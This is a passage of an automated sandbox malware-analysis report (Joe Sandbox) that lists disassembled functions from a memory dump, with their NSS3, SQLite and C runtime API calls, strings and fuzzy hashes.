Part of subcall function 6CB014C0: TlsGetValue.KERNEL32 ref: 6CB014E0
Part of subcall function 6CB014C0: EnterCriticalSection.KERNEL32 ref: 6CB014F5
Part of subcall function 6CB014C0: PR_Unlock.NSS3 ref: 6CB0150D

PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6CB09EE4

Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB010F3
Part of subcall function 6CB010C0: EnterCriticalSection.KERNEL32(?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0110C
Part of subcall function 6CB010C0: PL_ArenaAllocate.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01141
Part of subcall function 6CB010C0: PR_Unlock.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01182
Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0119C

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB09F38

Part of subcall function 6CB0D030: PORT_NewArena_Util.NSS3(00000400,00000000,?,00000000,?,6CB09F0B), ref: 6CB0D03B
Part of subcall function 6CB0D030: PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6CB0D04E
Part of subcall function 6CB0D030: SECOID_FindOIDByTag_Util.NSS3(00000019), ref: 6CB0D07B
Part of subcall function 6CB0D030: SECITEM_CopyItem_Util.NSS3(00000000,-00000018,00000000), ref: 6CB0D08E
Part of subcall function 6CB0D030: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CB0D09D

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB09F49
SEC_PKCS7DestroyContentInfo.NSS3(?), ref: 6CB09F59

Part of subcall function 6CB09D60: PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6CB09C5B), ref: 6CB09D82
Part of subcall function 6CB09D60: PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6CB09C5B), ref: 6CB09DA9
Part of subcall function 6CB09D60: PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6CB09C5B), ref: 6CB09DCE
Part of subcall function 6CB09D60: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6CB09C5B), ref: 6CB09E43

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Arena_CriticalEnterErrorGrow_Mark_SectionUnlock$AllocateContentCopyDestroyFindFreeInfoItem_Tag_
String ID:
API String ID: 4287675220-0
Opcode ID: 132886c8e85c4853bc8e1c53b1aed6ae3bf3f6f8f3c0773f36a280f0f549c6b0
Instruction ID: 4f573477a77d6e9fbee768d4f884a6f14ceb1f7ce4b000caade56e6cc57b079e
Opcode Fuzzy Hash: 132886c8e85c4853bc8e1c53b1aed6ae3bf3f6f8f3c0773f36a280f0f549c6b0
Instruction Fuzzy Hash: F6112EB5F042815BFB109B759C0079F7B54EF9474CF144135F50A8B740FB61F9188292

Function 6CBBCDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CBBD086
PR_Malloc.NSS3(00000001), ref: 6CBBD0B9
PR_Free.NSS3(?), ref: 6CBBD138

Strings

>, xrefs: 6CBBCF5B

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: FreeMallocstrlen
String ID: >
API String ID: 1782319670-325317158
Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction ID: 21a10049aaa84002bb748e82620d7987e9d7e900f2a40676eba387915cbde523
Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction Fuzzy Hash: 45D12962B819C64BEB14887C98713FA7797C782374F584325D521BBBE9EE3D88478342

Function 6CB5AD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edabb7f30a4d4231599ea1d4a158fd8f1add8623503cadfde3d9748f3f5983ea
Instruction ID: 0d057dee6387eb360eee05742b57a361fbdae1012a2ff4a827c85645dd6b43ba
Opcode Fuzzy Hash: edabb7f30a4d4231599ea1d4a158fd8f1add8623503cadfde3d9748f3f5983ea
Instruction Fuzzy Hash: FBF1BB71F012958BDB04CF28E8417BEB7F5EB4A308F55422DC925E7B44EB70A962CB91

Function 6CB4DFC0 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 344stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6CA25001,?,00000003,00000000), ref: 6CB4DFD7
memset.VCRUNTIME140(00000000,00000000,?,?,?,00000003,?,6CA25001,?), ref: 6CB4E2B7
memcpy.VCRUNTIME140(00000028,00000003,?,?,?,?,?,?,00000003,?,6CA25001,?), ref: 6CB4E2DA

Strings

W, xrefs: 6CB4E111

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: memcpymemsetstrlen
String ID: W
API String ID: 160209724-655174618
Opcode ID: 4b09479265f5f60db65707dd40a9634eeab5c0c60ae7ef77ef8b20bf67ecf1cb
Instruction ID: 700b4021e3d6102137ea159306050f0b4744909c12f04e0e53bea861bc9666a3
Opcode Fuzzy Hash: 4b09479265f5f60db65707dd40a9634eeab5c0c60ae7ef77ef8b20bf67ecf1cb
Instruction Fuzzy Hash: 3BC1F931A4D2D58BDB05CF2984906AEF7B2FF86308F18C1A9DCA95BB49D731A801D7D1

Function 6CA36F10 Relevance: 5.2, Strings: 4, Instructions: 218COMMON

Download Yara Rule

Strings

unordered*, xrefs: 6CA3702B
sz=[0-9]*, xrefs: 6CA37049
*?[, xrefs: 6CA37034, 6CA37052, 6CA37070
noskipscan*, xrefs: 6CA37067

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID:
String ID: *?[$noskipscan*$sz=[0-9]*$unordered*
API String ID: 0-3485574213
Opcode ID: 64827055bd2a1712f032f0d17da65764ede39de9aa6c0a05db8581f6c2edfaa5
Instruction ID: 6f9e4f7930bca8c2e71f7955c5ce9b26fd62ec7d91034005fca74269194d791f
Opcode Fuzzy Hash: 64827055bd2a1712f032f0d17da65764ede39de9aa6c0a05db8581f6c2edfaa5
Instruction Fuzzy Hash: 07717E36F001218BDB14896DCDA03AAB3A29F86314F295278C95DEBFD1D6754CC687C1

Function 6CA53EC0 Relevance: 4.3, Strings: 3, Instructions: 583COMMON

Download Yara Rule

Strings

sqlite_, xrefs: 6CA53FAA, 6CA54185
sqlite_master, xrefs: 6CA5463F
sqlite_temp_master, xrefs: 6CA5460F

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID:
String ID: sqlite_$sqlite_master$sqlite_temp_master
API String ID: 0-4221611869
Opcode ID: 5c47f3741f6c7e56e9a203e6b5b80612c907da8c1c6e05c469cd330f8ee9f9c0
Instruction ID: c0c3dcecfadf58d98933216c80ea9ac431387a28da8ef45d916dc8ef0f5d22d3
Opcode Fuzzy Hash: 5c47f3741f6c7e56e9a203e6b5b80612c907da8c1c6e05c469cd330f8ee9f9c0
Instruction Fuzzy Hash: F7224735A4D2954FD7048B2A80602B67BF2AF46318BECC5D8C9E15FA56D632ECF1C780

Function 6CB8BE70 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 1029COMMON

Download Yara Rule

Strings

`, xrefs: 6CB8C0B6

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: e375f3301a24400754ecd059e4c35f79a265e731ec50c6212eb9473f0130a5d8
Instruction ID: a7cf8f327797ce9c3decf1e2c7a8c1eae19736baa486bbec9ccb60799a13757e
Opcode Fuzzy Hash: e375f3301a24400754ecd059e4c35f79a265e731ec50c6212eb9473f0130a5d8
Instruction Fuzzy Hash: 809271B4A052898FDB05DF64C890BBEB7B2FF48308F248268D515A7B91D735EC46CB51

Function 6CA23D80 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 164COMMON

Download Yara Rule

APIs

htonl.WSOCK32(00000000), ref: 6CA23EA9

Strings

0, xrefs: 6CA23DAB

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: htonl
String ID: 0
API String ID: 2009864989-4108050209
Opcode ID: c0b9ecb2a4783bb288ed8c334c08b3fe795e36e85226d8b2d29fb0e1973d8e22
Instruction ID: 32e040957e6421cfa11b8efb9aec99e90d671650221d0d9a0462c1389d63c663
Opcode Fuzzy Hash: c0b9ecb2a4783bb288ed8c334c08b3fe795e36e85226d8b2d29fb0e1973d8e22
Instruction Fuzzy Hash: 7B511831A4B0B98ADB15467D88603FFBBF99B43714F1D4329C5E567AC0C67C458D8790

Function 6CACEE70 Relevance: 3.2, APIs: 2, Instructions: 223COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CACF019
PK11_GenerateRandom.NSS3(?,00000000), ref: 6CACF0F9

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: ErrorGenerateK11_Random
String ID:
API String ID: 3009229198-0
Opcode ID: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction ID: f7ea9357a0506f38f0913c5a4a9e168fa483013d8ce1011bc3c293e162ce23df
Opcode Fuzzy Hash: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction Fuzzy Hash: D2918F71B0161A8BCB14CF69CC916AEB7F1FF85324F24462DD962A7BC0D730A945CB92

Function 6CAF2F70 Relevance: 3.1, APIs: 2, Instructions: 149COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000000,?,6CB17929), ref: 6CAF2FAC
PR_SetError.NSS3(FFFFE040,00000000,00000000,?,6CB17929), ref: 6CAF2FE0

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Error
String ID:
API String ID: 2619118453-0
Opcode ID: d46aaede54373f0ad48c0b1f8e3a7ab5ea5097c73dfbb60e70d671b187b32a75
Instruction ID: 50c52b31d76ff8fae9777c42beb620889b613e720bcfafb82878e82f9b8e479d
Opcode Fuzzy Hash: d46aaede54373f0ad48c0b1f8e3a7ab5ea5097c73dfbb60e70d671b187b32a75
Instruction Fuzzy Hash: 1651F771B069518FDB10CE59C880B6A73B1FF45318F19426AF9A99BB01D731E9C7CB82

Function 6CB10E20 Relevance: 2.8, APIs: 2, Instructions: 279COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6CB11052
memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6CB11086

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: memcpymemset
String ID:
API String ID: 1297977491-0
Opcode ID: a9ccac84fa3a69516322b085216a93e44f9260785e59be26a24e216fc244f54d
Instruction ID: 7de117061fc3e02449286494e1633ec9b16b23ff891918c16b76e4dda9125948
Opcode Fuzzy Hash: a9ccac84fa3a69516322b085216a93e44f9260785e59be26a24e216fc244f54d
Instruction Fuzzy Hash: 97A13B71F0528A9FCF08CF99D994AEEBBB6FF48314B148129E914A7B00D735AC11CB90

Function 6CA3AC60 Relevance: 2.7, Strings: 2, Instructions: 181COMMON

Download Yara Rule

Strings

winUnlockReadLock, xrefs: 6CA3AE9F
winUnlock, xrefs: 6CA3AE18

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID:
String ID: winUnlock$winUnlockReadLock
API String ID: 0-3432436631
Opcode ID: 425a441b7e0071ee4cbf3bfd94675321143297dfb99024e001f13c46e2dec120
Instruction ID: 17bb2374373b0491b012b6428ae05d065ddb441444dcaf70cb88c4e04c6330b1
Opcode Fuzzy Hash: 425a441b7e0071ee4cbf3bfd94675321143297dfb99024e001f13c46e2dec120
Instruction Fuzzy Hash: B4718B70608250ABDB04CF28E894AABBBF5FF89314F14C61DF99997341D730AD86CB81

Function 6CAFED70 Relevance: 1.7, APIs: 1, Instructions: 217memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6CAFEE3D

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Alloc_ArenaUtil
String ID:
API String ID: 2062749931-0
Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction ID: 3e460be789548e404146423cad7bc01a966766665d305706f7ca9f9cc8fab580
Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction Fuzzy Hash: 5871D672E017018FE718CF59D88066AB7F2BF88304F19462DE86597B91D770E986CB91

Function 6CA25F30 Relevance: 1.6, APIs: 1, Instructions: 350stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000), ref: 6CA26013

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: strcmp
String ID:
API String ID: 1004003707-0
Opcode ID: d7f8951f8c25d68ac3361ddccf4a445a7cc51990a829c232f3e22cb50f8b3204
Instruction ID: ea7688423dbe0d9492db6e193f2bdad0e4b73ea5aba9d0b1eac603f04850e16e
Opcode Fuzzy Hash: d7f8951f8c25d68ac3361ddccf4a445a7cc51990a829c232f3e22cb50f8b3204
Instruction Fuzzy Hash: B0C13874B066268BDB14CF19C8907AAB7F2BF45318F2C8168D995D7B45D738E8C1CB90

Function 6CA34DB0 Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

winUnlockReadLock, xrefs: 6CA35125

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID:
String ID: winUnlockReadLock
API String ID: 0-4244601998
Opcode ID: 3cd02ea7bf9e230399230660ac707bd71d4ad4a75ef77c7b7d058a3ca3202374
Instruction ID: e31c7047209a11ceb4e2a3fba3afbff8c9add0fe05cd74e88fc55cceb280c367
Opcode Fuzzy Hash: 3cd02ea7bf9e230399230660ac707bd71d4ad4a75ef77c7b7d058a3ca3202374
Instruction Fuzzy Hash: 23E11A74A083808FDB05DF28E49466EBBF0FF89308F159A1DE89997351E731D985CB82

Function 6CBB5E60 Relevance: 1.4, APIs: 1, Instructions: 163COMMON

Download Yara Rule

APIs

Part of subcall function 6CBB5B90: PR_Lock.NSS3(00010000,?,00000000,?,6CA9DF9B), ref: 6CBB5B9E
Part of subcall function 6CBB5B90: PR_Unlock.NSS3 ref: 6CBB5BEA

memset.VCRUNTIME140(00000014,00000000,-000000D7,?,?,?,?,?,?,?,?,6CBB5E23,6CA9E154), ref: 6CBB5EBF

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: LockUnlockmemset
String ID:
API String ID: 1725470033-0
Opcode ID: 765870e01ac74a1a285e53e67be40ac57547b096a3347e8632765bb24f41ae14
Instruction ID: 9527d672e7d534259e1f48c429b98c2141815c56f2164c0849b16d73b2b2ba2d
Opcode Fuzzy Hash: 765870e01ac74a1a285e53e67be40ac57547b096a3347e8632765bb24f41ae14
Instruction Fuzzy Hash: DE519D72E0021A8FDB18CF59C8816AEF3B2FF88314B19456DD815B7755DB30A945CBA1

Function 6CB6DCD0 Relevance: .4, Instructions: 371COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad777b2bd0524d6c2bd208ea05b354113b5d0f4c5f95eec3534f33ce17d935bd
Instruction ID: c30b2359581fc55c97f37dff4153218b790041799d2624e9169a5b250865fc59
Opcode Fuzzy Hash: ad777b2bd0524d6c2bd208ea05b354113b5d0f4c5f95eec3534f33ce17d935bd
Instruction Fuzzy Hash: 90F15C71A012458FDB08CF29D8907AE77B6FF89318F294168D8199BB41CB35ED42CBD2

Function 6CB01DC0 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

